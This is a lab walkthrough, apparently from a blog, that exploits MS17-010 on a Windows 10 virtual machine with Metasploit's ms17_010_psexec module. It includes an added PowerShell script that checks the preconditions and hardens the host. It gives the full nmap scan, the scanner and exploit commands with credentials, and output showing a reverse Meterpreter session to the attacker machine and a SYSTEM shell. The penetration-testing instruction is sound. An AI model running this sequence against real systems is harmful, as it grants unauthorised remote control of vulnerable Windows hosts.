
Metasploit: the ms17_010_psexec module

MS17-010_psexec is one of Metasploit's modules. It needs an account and password on the target to get in (ms17_010_eternalblue needs no target credentials, but for me it always reports a timeout). Strictly, the module only needs a named pipe it can open over SMB: it can use an anonymous pipe where the target exposes one, but Windows 10 exposes none by default, so against this target the account and password are required.

Requirements for using MS17-010_psexec:
The firewall must let SMB traffic in and out. (Either turn the firewall off, or create a shared folder once: creating a share enables the File and Printer Sharing firewall rule, and that rule stays enabled even after the share is deleted.)
The target must have SMBv1 enabled (the exploit speaks SMB1; SMB2/3 alone is not enough).
The target must be missing the MS17-010 patch.
The target must expose a named pipe the module can open: either anonymously over IPC$, or, as in this walkthrough, with the SMBUser/SMBPass credentials.
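The four preconditions above can be verified, and afterwards closed again, on the target itself. The script below is an added example, not code from the original post or from Metasploit; it assumes the Windows 10 build 10240 VM used here, an elevated PowerShell prompt, and that any cumulative update installed on or after 2017-03-14 (the MS17-010 release date) carries the fix, since Windows 10 updates are cumulative.

```powershell
<#
  Added example (not part of the original post): run in an elevated PowerShell
  on the Windows 10 lab VM to confirm the four preconditions before trying the
  module and, with -Harden, to close each one again afterwards.
  Assumptions: Windows 10 build 10240 as in the walkthrough; any update
  installed on or after 2017-03-14 includes the MS17-010 fix (KB4012606 is the
  original package for build 10240).
#>
param([switch]$Harden)

$ErrorActionPreference = 'Stop'
$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Test-Ms17010Preconditions {
    $r = [ordered]@{}

    # 1. Firewall: creating a share enables the "File and Printer Sharing"
    #    rule group, and the inbound SMB rule stays on after the share is gone.
    $smbIn = Get-NetFirewallRule -DisplayGroup 'File and Printer Sharing' |
             Where-Object { $_.Direction -eq 'Inbound' -and $_.Enabled -eq 'True' }
    $r['Inbound SMB allowed by firewall'] = [bool]$smbIn

    # 2. SMBv1 must be on: the exploit only works over SMB1.
    $r['SMBv1 enabled'] = [bool](Get-SmbServerConfiguration).EnableSMB1Protocol

    # 3. Unpatched: Get-HotFix lists KB4012606 only if that exact package is
    #    installed, so instead treat any update dated on/after the MS17-010
    #    release as carrying the fix (cumulative updates supersede it).
    $patched = Get-HotFix | Where-Object { $_.InstalledOn -ge [datetime]'2017-03-14' }
    $r['MS17-010 patch missing'] = -not [bool]$patched

    # 4. Pipe access: with SMBUser/SMBPass set, the module just needs a named
    #    pipe that user may open. Credential-less use additionally needs a pipe
    #    listed in NullSessionPipes and RestrictNullSessAccess cleared.
    $p = Get-ItemProperty $lanman
    $r['NullSessionPipes'] = ($p.NullSessionPipes -join ',')
    $r['RestrictNullSessAccess'] = $p.RestrictNullSessAccess

    [pscustomobject]$r
}

function Invoke-Ms17010Hardening {
    # Reverse of the preconditions: SMBv1 off at both the server and the
    # feature layer, inbound SMB rule off, and the update still has to be
    # installed by hand. A reboot completes the feature removal.
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
    Set-NetFirewallRule -DisplayGroup 'File and Printer Sharing' -Enabled False
    Write-Warning 'Install the current cumulative update (KB4012606 or later for build 10240) and reboot.'
}

Test-Ms17010Preconditions | Format-List
if ($Harden) { Invoke-Ms17010Hardening }
```

Run it once before the attack to see four "True" values, and with -Harden after the exercise; a second run should then show SMBv1 and the firewall rule off, which is also the order of fixes to apply on any production host that reports the same way.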

Attacker: Kali 192.168.1.104
Target: Windows 10 Enterprise virtual machine

1. First test whether the target 192.168.1.108 has port 445 open

┌──(wenqiang㉿kali)-[~]
└─$ nmap -Pn 192.168.1.108
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-21 16:09 CST
Nmap scan report for 192.168.1.108
Host is up (0.00065s latency).       # The target is alive. -Pn skips the ping probe, so this works even if ICMP is blocked
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds    # Port 445 is open on the target
2869/tcp open  icslap
5357/tcp open  wsdapi
MAC Address: 00:0C:29:E8:5E:F3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.13 seconds

2. Confirm whether the target is vulnerable to MS17-010

# Enter the Metasploit console
┌──(wenqiang㉿kali)-[~]
└─$ msfconsole   # this command opens the Metasploit console

# List the modules related to this vulnerability
msf6 > search ms17-010  

# Select the scanner module; it checks whether the target is vulnerable to MS17-010
msf6 > use auxiliary/scanner/smb/smb_ms17_010 
# Set the target IP address
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.108  # or a range, e.g. set rhosts 192.168.1.0/24
# When scanning several IPs, use more threads
msf6 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 10
# Check that the options are set correctly
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
RHOSTS       192.168.1.108        yes
# Run the module. "Host is likely VULNERABLE" means the vulnerability is present; otherwise it prints "is not vulnerable".
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.1.108:445     - Host is likely VULNERABLE to MS17-010! - Windows 10 Enterprise 10240 x64 (64-bit)
[-] 192.168.1.108:445     - Errno::ECONNRESET: Connection reset by peer   # the target closing the probe connection afterwards is harmless; the [+] line is the verdict
[*] 192.168.1.108:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# Switch to exploit/windows/smb/ms17_010_psexec to start the exploitation
msf6  > use exploit/windows/smb/ms17_010_psexec
# Set the target IP
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.108
# Set the target account and password (any account that can authenticate to the target over SMB; the shared folder only matters for opening the firewall)
msf6 exploit(windows/smb/ms17_010_psexec) > set smbuser wenqiang    
msf6 exploit(windows/smb/ms17_010_psexec) > set smbpass wenqiang123
# Check that the options are set correctly
msf6 exploit(windows/smb/ms17_010_psexec) > show options
# Launch the exploit
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 192.168.1.104:4444 
[*] 192.168.1.108:445 - Authenticating to 192.168.1.108 as user 'wenqiang'...
[*] 192.168.1.108:445 - Target OS: Windows 10 Enterprise 10240
[*] 192.168.1.108:445 - Built a write-what-where primitive...
[+] 192.168.1.108:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.108:445 - Selecting PowerShell target
[*] 192.168.1.108:445 - Executing the payload...
[+] 192.168.1.108:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (177734 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.108:49897) at 2024-12-21 16:27:29 +0800
# A meterpreter prompt means the exploit succeeded; type shell and press Enter to get a command prompt on the target
meterpreter > shell
Process 1544 created.
Channel 1 created.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

# Create a folder named hello on the target's desktop
C:\Windows\system32>cd \
C:\>cd Users\wenqiang\Desktop
C:\Users\wenqiang\Desktop>mkdir hello
C:\Users\wenqiang\Desktop>dir
2024/12/21  16:27    <DIR>          hello

Original article: https://blog.csdn.net/qq_25096749/article/details/144632454